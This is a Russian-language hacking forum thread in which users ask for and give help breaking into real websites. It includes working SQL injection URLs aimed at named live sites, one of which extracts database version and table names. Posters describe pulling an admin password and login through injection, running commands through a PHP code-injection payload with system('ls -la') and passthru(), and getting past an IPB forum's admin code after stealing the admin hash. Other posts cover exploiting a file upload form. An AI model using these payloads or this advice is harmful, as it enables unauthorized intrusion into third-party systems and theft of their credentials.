Да, ребяты, даже не знаю что и сказать Тоесть вот так вот просто, выходим за скобки и кавычки, и выполняем php код, да? Круто!!! А что тогда скромничать и mysql_query , выполняй уж что-то посерьёзнее =\ Инновации хек индустрии
В cgi-bin прав на запись нет, заливаю test.pl в произвольную папку, предварительно создав .htaccess c таким содержанием: Получаю: Perl точно установлен. В чем проблема?
К логам доступа нет. А Options все таки работают, т.к. без .htaccess файлы *.pl выдаются просто на скачивание.
проблема скорее всего именно в нехватке прав, попробуй найти что-нибудь кроме /var/www/cgi-bin что-нибудь вроде locate default и попробовать поискать что-то такое: ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/ может быть не только из /var/www/cgi-bin можно выполнять
Так через perl test.pl все работает, так что, думаю, не в правах дело. Нет, нету. Да и каталог-то, в который я могу писАть, всего один.
http://ashtarakkat.com/en/products/showProduct/63/ и зделаю так.. http://ashtarakkat.com/en/products/showProduct/63%27 скаjите поjaлуста ето sql ?? и как зделать ??
не путай perl test.pl и запуск perl-скрипта из веба, абсолютно разные вещи. PS: perl test.pl будет работать в любых .*nix, если админ не изврашенец
Ручками я и сейчас могу через passthru(), но на это уйдет много времени. ls, cat и т.д. - это, конечно, гибко, но не удобно.
Подскажите можно ли здесь подобрать: http://www.qatardevbank.com/ar/viewsubs.php?id=-2+order+by+5+--+ http://www.qatardevbank.com/ar/viewsubs.php?id=(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+(select+1+union+select+2+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3)x+group+by+2+limit+1)a)+--+ http://www.qatardevbank.com/ar/viewsubs.php?id=-2+and+(select*from(select+count(*)from(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+TABLE_NAME+from+INFORMATION_SCHEMA.TABLES+limit+1,1),1,64),floor(rand(0)*2)))z)+--+
Code: http://www.qatardevbank.com/ar/viewsubs.php?id=-2+or+1=1+and+substring(version(),1,1)=4 для начала
Да кавычки фунициклируют, ну да столбец принтабельный таким методом выудил пас и лог от админки, правда по очереди, т.е. в два запроса каждый раз обрашаясь только к первому столбцу за один запрос неполучалось, скуль 4.18, покрайней мере так н мап сказал, другим способом не узнавалось. Что касается загрузчика то даже не представляю как он выглядит, в смысле его код, на всей странице есть только ява Code: <!-- 3function MM_jumpMenu(targ,selObj,restore){ //v3.0 4 eval(targ+".location='"+selObj.options[selObj.selectedIndex].value+"'"); 5 if (restore) selObj.selectedIndex=0; 6} 7//--> но что то мне подсказывает отношения к загрузке это не имеет. Что касается самой конопки загрузки то фаер баг очень скупо о ней отзываеться Code: <input type="file" name="img_mini"> - об окне ввода пути откуда загружать Code: <input type="submit" value="Вставить файлы" id="files" name="files"> - собственно кнопка заливки. Есть идеи как это можно проэксплуатировать? )
Получается да. Проверил на локалке все работает А чего тогда скуль раскручивать в гет запросах, хеши какие-то пытаться вытягивать? Не... я просто новичек, может опять чего-то не понимаю Это цветочки... Уже есть идеи как магик.квотес обходить.
А, ну тогда нормально, ты хакер Да не запаривайся ты. Раз у тебя на локалке работает то, что ты показывал, ломай интырнеты! Ну сам подумай, вот допустим код: PHP: $id = $_GET['id']; echo "$id"; А ты его вот так : test.php?id=1']; system('ls -la'); // пыщ-пыщ!111 Если тот пример работает, то почему-бы этому не сработать? Grey: даже особые обстоятельства Пашкелы не сравнятся с новым методом ^_^
Классно!!! А я думал хакеров нету ну да... с гетами это не работает, наверно потому что кодировка менется, хотя вам лучше знать
Вопрос знатокам: есть форум ибф Powered by*Invision Power Board(U) v1.3 Final © 2003 *IPS, Inc. Русский Модифицированный IPB v1.3 Final © 2003*BesTFileZ.Net*&*IBR Team*.Через скулю нашел хеш админа, выполняю вход, и потом когда хочу зайти в админку мне помимо пароля просит ввести еще личный код админа.Собственно и сам вопрос где в базе хранитыса данный код? и если хранится он в базе.
Тоже встречал такое.. Админы ставлят на админку еще бейс авторизацию и зачастую логин и пасс находится НЕ в бд. Если FILE_PRIV: Y , то читай файлы админки
